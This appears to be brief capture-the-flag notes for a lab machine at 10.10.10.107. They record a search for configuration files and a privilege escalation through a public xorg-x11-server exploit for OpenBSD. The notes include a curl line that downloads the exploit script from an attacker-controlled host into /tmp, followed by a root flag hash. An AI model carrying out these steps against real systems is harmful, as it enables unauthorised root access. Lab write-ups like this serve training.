#10.10.10.107
--------------
#find conf files

find / -name *.conf 2>/dev/null
>>>https://code.fb.com/production-engineering/scalable-and-secure-access-with-ssh/
-------------------------------------------------------------------------------

#exploit xorg service
#latest vulnerability found in xorg-x11
#exploit targets OpenBSD's cron in order to escalate privileges to root on OpenBSD 6.3 and 6.4.
#google:-  xorg-x11-server 1.20.3 - Privilege Escalation
>>>https://www.exploit-db.com/exploits/45742
#upload 45742.sh onto /tmp folder
curl http://<ip>/file -o file.sh
#change permission
#got root


#key
1265f8e0a1984edd9dc1b6c3fcd1757f
